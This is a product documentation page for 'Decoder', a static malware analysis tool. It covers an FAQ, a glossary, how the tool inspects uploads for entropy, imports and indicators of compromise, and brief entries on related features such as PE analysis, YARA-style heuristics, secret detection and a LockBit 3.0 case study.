Do I need an API key to run static malware analysis?

No. Static and malware checks run free, without any provider key. AI explanations and chat need BYOK or a local model.

Is the file executed?

Never. Static analysis reads the bytes, parses structure and matches patterns. Nothing is run.

What file types are supported?

Single files in 20+ languages, ZIP archives, and PE binaries. ZIPs are wrapped server-side with zip-slip protection.

Is it a replacement for an antivirus?

No. It is a triage and explainability layer that complements AV/EDR and dynamic sandboxes.

capability

Analysis

#security

#malware

#static

#no-ai

Static Malware Analysis

Static malware analysis inspects code and binaries without executing them. Decoder runs it locally on your upload and surfaces suspicious patterns, entropy spikes and known indicators — no API key required.

Reading level

What it is

Pattern-, structure- and entropy-based inspection of code and compiled artefacts performed without executing them.

Why it's useful

Catches obfuscation, packed sections, suspicious imports and known-bad strings cheaply and deterministically, before a sandbox or a human reviewer.

How Decoder implements it

Decoder parses the upload (single file, ZIP, PE binary) server-side, runs language-aware heuristics, computes entropy per section, scans for IoCs, and produces a structured report with severity and rationale.

When to use it

Triage of untrusted uploads, CI gating, pre-execution checks on customer artefacts, IR enrichment on a sample.

When NOT to use it

When you need runtime behaviour (C2 traffic, persistence, encryption activity) — pair it with a dynamic sandbox.

Practical example

A LockBit 3.0 dropper uploaded as a ZIP: Decoder flagged the high-entropy section, suspicious Win32 imports and the encoded PowerShell stage without execution.

FAQ

Glossary

Static analysis: Inspection of code or binaries without executing them.
Dynamic analysis: Observation of a program's behaviour while it runs in an isolated sandbox.
Entropy: Statistical measure of randomness; high entropy in a binary section often signals packing or encryption.
IoC: Indicator of Compromise — an artefact (hash, string, URL, registry key) associated with known malicious activity.
Dropper: Stage-one malware whose job is to fetch and execute the real payload.

capability

Binary (PE) Analysis

Decoder parses Windows PE binaries to expose the structural signals a reviewer needs: sections, imports, exports, per-section entropy and known IoCs.

concept

Entropy in Malware Analysis

Entropy is a statistical measure of how 'random' the bytes in a file look. In malware analysis, abnormally high entropy is a strong signal that a section is packed, encrypted or otherwise obfuscated.

format

PowerShell Script Analysis

PowerShell is the workhorse of Windows post-exploitation. Decoder reads `.ps1` files statically and surfaces the patterns attackers rely on: encoded commands, `Invoke-Expression`, download cradles, AMSI bypasses.

format

ZIP Archive Analysis

ZIPs are the most common way to ship code and the most abused way to ship malware. Decoder ingests a ZIP server-side with hardened guards and exposes its content for review.

capability

AI-Origin Detection

AI-Origin Detection estimates whether a code artefact was likely produced by an LLM, and explains why. The goal is informed review, not gatekeeping.

capability

Repository Analysis

Repository Analysis turns a codebase into something you can read, search and interrogate. Upload a ZIP or import a public GitHub project; Decoder indexes structure, runs static checks and gates AI features behind your own key.

concept

Severity Scoring — How Decoder ranks findings

Severity tells you what to fix first. Decoder normalises every finding into Critical / High / Medium / Low using signal strength, exploitability, and project context.

concept

CWE Mapping — Mapping findings to MITRE CWE

CWE (Common Weakness Enumeration) is the MITRE taxonomy of software weaknesses. Decoder attaches a CWE ID where applicable so findings are comparable across tools and reports.

concept

YARA Rules — Pattern-based malware detection

YARA is a rule language used by malware analysts to describe families and behaviours. Decoder applies YARA-style heuristics during malware scans.

capability

Secret Detection — Finding leaked keys

A leaked key is the most common breach vector. Decoder combines provider-specific regex (AWS, GitHub, Stripe…) with entropy to flag secrets that don't belong in code.

capability

Dependency Analysis — Inspecting third-party code

Most code in any modern project isn't yours. Decoder reads manifests and lockfiles to map the dependency surface and flag suspicious entries.

concept

SAST — Static Application Security Testing

SAST inspects source code to find security weaknesses before runtime. Decoder ships SAST as a free, no-key feature across 20+ languages.

concept

Supply Chain Security — Trusting what you ship

Supply chain security is about trusting the code you didn't write. Decoder helps inventory and inspect that surface during analysis.

concept

LockBit 3.0 — Case study in Decoder

LockBit 3.0 leaked source provided a real-world benchmark. This entry walks through what Decoder flags and why — useful as a reference for ransomware patterns.

format

Python — Supported format

Python is a first-class format in Decoder. Upload a single .py, a ZIP, or import a GitHub repo and get static + malware findings.

format

JavaScript & TypeScript — Supported formats

JavaScript and TypeScript are first-class in Decoder. Upload single files, ZIPs, or import a GitHub repo.

format

Java — Supported format

Java is supported as a first-class format. Rules cover the common enterprise weakness classes mapped to CWE.

format

Dockerfile — Supported format

Dockerfiles are configuration that becomes runtime. Decoder flags the common foot-guns before they hit your registry.